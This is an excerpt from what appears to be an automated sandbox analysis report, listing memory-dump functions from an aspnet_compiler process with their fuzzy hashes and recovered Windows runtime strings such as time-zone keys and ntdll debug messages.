                                                          • Associated: 0000000D.00000002.541838818.00000000008B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_7a0000_aspnet_compiler.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                                                          • Instruction ID: 152fdd420af7dfcc6df86c72954370e6eab1db85fd0a81c34441345ed48de2b3
                                                          • Opcode Fuzzy Hash: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                                                          • Instruction Fuzzy Hash: 27B01272141540C7E349A714D90AB6B7220FB80F00F00893AE00781852DB389B2CD98A
                                                          Function 007BFD8C Relevance: .0, Instructions: 6COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.541838818.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                          • Associated: 0000000D.00000002.541838818.00000000007A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000890000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_7a0000_aspnet_compiler.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                          • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                                          • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                          • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                                          Function 007C1D80 Relevance: .0, Instructions: 6COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.541838818.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                          • Associated: 0000000D.00000002.541838818.00000000007A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000890000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_7a0000_aspnet_compiler.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
                                                          • Instruction ID: c40cb18f784fb740092d7f35057b9839572fe11e4001cfe90af8ac8386c88b07
                                                          • Opcode Fuzzy Hash: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
                                                          • Instruction Fuzzy Hash: A6B09271508A40C7E204A704D985B46B221FB90B00F408938A04B865A0D72CA928C686
                                                          Function 007BFE24 Relevance: .0, Instructions: 6COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.541838818.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                          • Associated: 0000000D.00000002.541838818.00000000007A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000890000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_7a0000_aspnet_compiler.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
                                                          • Instruction ID: 4523e9276363b51c29093556ee00c3605be97a6a096d126b10744d78506899f7
                                                          • Opcode Fuzzy Hash: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
                                                          • Instruction Fuzzy Hash: E7B012B2104580C7E31A9714D906B4B7210FB80F00F40893AA00B81861DB389A2CD456
                                                          Function 007BFED0 Relevance: .0, Instructions: 6COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.541838818.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                          • Associated: 0000000D.00000002.541838818.00000000007A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000890000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_7a0000_aspnet_compiler.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                          • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                                          • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                          • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                                          Function 007BFEA0 Relevance: .0, Instructions: 6COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.541838818.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                          • Associated: 0000000D.00000002.541838818.00000000007A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000890000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_7a0000_aspnet_compiler.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                          • Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
                                                          • Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                          • Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556
                                                          Function 007BFF34 Relevance: .0, Instructions: 6COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.541838818.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                          • Associated: 0000000D.00000002.541838818.00000000007A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000890000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_7a0000_aspnet_compiler.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                                                          • Instruction ID: c0177d7ad0d10355b3c7d2619bc7f24452a3c2aab25a1a733e07692cdee9b307
                                                          • Opcode Fuzzy Hash: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                                                          • Instruction Fuzzy Hash: B1B012B2200540C7E319D714D906F4B7210FB80F00F40893AB10B81862DB3C992CD45A
                                                          Function 007BFFFC Relevance: .0, Instructions: 6COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.541838818.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                          • Associated: 0000000D.00000002.541838818.00000000007A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000890000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_7a0000_aspnet_compiler.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                                                          • Instruction ID: 5af6445773ea8696aa9cd62fdf5509cf1cb9f7b4cf56a5a77559796e3d2133fe
                                                          • Opcode Fuzzy Hash: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                                                          • Instruction Fuzzy Hash: 07B012B2240540C7E30D9714D906B4B7250FBC0F00F00893AE10B81850DA3C993CC44B
                                                          Function 007BFFB4 Relevance: .0, Instructions: 6COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.541838818.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                          • Associated: 0000000D.00000002.541838818.00000000007A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000890000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_7a0000_aspnet_compiler.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                          • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                                          • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                          • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                                          Function 007E8788 Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          • Kernel-MUI-Language-SKU, xrefs: 007E89FC
                                                          • Kernel-MUI-Number-Allowed, xrefs: 007E87E6
                                                          • WindowsExcludedProcs, xrefs: 007E87C1
                                                          • Kernel-MUI-Language-Disallowed, xrefs: 007E8914
                                                          • Kernel-MUI-Language-Allowed, xrefs: 007E8827
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.541838818.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                          • Associated: 0000000D.00000002.541838818.00000000007A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000890000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_7a0000_aspnet_compiler.jbxd
                                                          Similarity
                                                          • API ID: _wcspbrk
                                                          • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                          • API String ID: 402402107-258546922
                                                          • Opcode ID: 52e122cb08ec7a2088c46307d3f1ffc65c86fc5cf1fca1da25abef0cdf600183
                                                          • Instruction ID: a8986a623f64c4f4038f1949989088faeaa9cdcf5af569c262231c6d3c4adeb6
                                                          • Opcode Fuzzy Hash: 52e122cb08ec7a2088c46307d3f1ffc65c86fc5cf1fca1da25abef0cdf600183
                                                          • Instruction Fuzzy Hash: B7F119B1D01249EFCF51EF95C985EEEB7B8FF08304F10446AE505A7211EB389A45DB91
                                                          Function 0085822C Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 160COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.541838818.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                          • Associated: 0000000D.00000002.541838818.00000000007A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000890000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_7a0000_aspnet_compiler.jbxd
                                                          Similarity
                                                          • API ID: _wcsnlen
                                                          • String ID: Bias$DaylightBias$DaylightName$DaylightStart$DynamicDaylightTimeDisabled$StandardBias$StandardName$StandardStart$TimeZoneKeyName
                                                          • API String ID: 3628947076-1387797911
                                                          • Opcode ID: ced24f8a416cd530a0370840b9c2a38075ed83d226fb3633a0b7fa68e2b49332
                                                          • Instruction ID: fa8e6cf2c08a4af1f6338f3161ff2d827695c096febd0a7addae7ecef85cbaa4
                                                          • Opcode Fuzzy Hash: ced24f8a416cd530a0370840b9c2a38075ed83d226fb3633a0b7fa68e2b49332
                                                          • Instruction Fuzzy Hash: 3F41A575241608FAEB019A94CC42FEEB76CFF04B85F104123BE14E6291DBB4DB588BA5
                                                          Function 008013CB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.541838818.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                          • Associated: 0000000D.00000002.541838818.00000000007A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000890000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_7a0000_aspnet_compiler.jbxd
                                                          Similarity
                                                          • API ID: ___swprintf_l
                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                          • API String ID: 48624451-2108815105
                                                          • Opcode ID: 2c0ebd0d5b82ef7de6a5ca16c0b36cb9b7128b03a33d84d35a212596b434c549
                                                          • Instruction ID: d73d477c25fad509070f99c7608d34a996b7572044c63991bf0c3c4bb3d32aaa
                                                          • Opcode Fuzzy Hash: 2c0ebd0d5b82ef7de6a5ca16c0b36cb9b7128b03a33d84d35a212596b434c549
                                                          • Instruction Fuzzy Hash: B76158B1A00A55AACF74DF59CC848BF7BB6FF94310714C02EE5D687681D338AA80CB64
                                                          Function 00863B8E Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 187COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.541838818.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                          • Associated: 0000000D.00000002.541838818.00000000007A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000890000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_7a0000_aspnet_compiler.jbxd
                                                          Similarity
                                                          • API ID: ___swprintf_l
                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                          • API String ID: 48624451-2108815105
                                                          • Opcode ID: 68adc6f0fe9be34b3c0eb26aa3b030ab183b48bbe856d127becc1b2746052892
                                                          • Instruction ID: c84c17ca26a97109a4db644025f4647958a22327514f9175d08e84111d439f73
                                                          • Opcode Fuzzy Hash: 68adc6f0fe9be34b3c0eb26aa3b030ab183b48bbe856d127becc1b2746052892
                                                          • Instruction Fuzzy Hash: C961A3B2900648ABDB20DF6DC84097E7BF5FF54310B15C529F9ADD7141E234EB409B61
                                                          Function 007F7EFD Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 127COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 00813F12
                                                          Strings
                                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0081E2FB
                                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00813F75
                                                          • x*,, xrefs: 007F7F1E
                                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00813EC4
                                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00813F4A
                                                          • Execute=1, xrefs: 00813F5E
                                                          • ExecuteOptions, xrefs: 00813F04
                                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 0081E345
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.541838818.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                          • Associated: 0000000D.00000002.541838818.00000000007A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000890000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_7a0000_aspnet_compiler.jbxd
                                                          Similarity
                                                          • API ID: BaseDataModuleQuery
                                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions$x*,
                                                          • API String ID: 3901378454-3100733887
                                                          • Opcode ID: 025fa708d32401c8ba014c35c9c44f7ebcaeebbecb4767bc324c958e2e1b99f7
                                                          • Instruction ID: 909ba003785f39a8e6c6ebbd78317c36aac85ffaaab7e29bd8832d54d3ad6e53
                                                          • Opcode Fuzzy Hash: 025fa708d32401c8ba014c35c9c44f7ebcaeebbecb4767bc324c958e2e1b99f7
                                                          • Instruction Fuzzy Hash: E5418B7164071CBADB209A94DCCAFEA73FCAF54700F0005ADB605E6192EA749A86DB61
                                                          Function 00800B15 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.541838818.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                          • Associated: 0000000D.00000002.541838818.00000000007A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000890000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_7a0000_aspnet_compiler.jbxd
                                                          Similarity
                                                          • API ID: __fassign
                                                          • String ID: .$:$:
                                                          • API String ID: 3965848254-2308638275
                                                          • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                          • Instruction ID: 27e830e99efe5c78719d1610343cfbccee6e8a663130254c199b500c1e3078d6
                                                          • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                          • Instruction Fuzzy Hash: 16A19A71D0031ADFEBA4CFA8CC547AEB7B5FB05315F24856AD852E72C2D6309A818F52
                                                          Function 00800554 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00822206
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.541838818.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                          • Associated: 0000000D.00000002.541838818.00000000007A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000890000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_7a0000_aspnet_compiler.jbxd
                                                          Similarity
                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                          • API String ID: 885266447-4236105082
                                                          • Opcode ID: bf2f1ccfff29660d4c287804e35abc7aff4a6eee736050c5b4032a15c508d53d
                                                          • Instruction ID: fe73e713b373f8848b9eb11bfd85c7016a003d7a46a812bdde68c3435352d399
                                                          • Opcode Fuzzy Hash: bf2f1ccfff29660d4c287804e35abc7aff4a6eee736050c5b4032a15c508d53d
                                                          • Instruction Fuzzy Hash: 0F513A75B002217BEB14CE18DC81FA673A9FF94710F21822DFD44DB285DA35EC828B91
                                                          Function 008014C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ___swprintf_l.LIBCMT ref: 0082EA22
                                                            • Part of subcall function 008013CB: ___swprintf_l.LIBCMT ref: 0080146B
                                                            • Part of subcall function 008013CB: ___swprintf_l.LIBCMT ref: 00801490
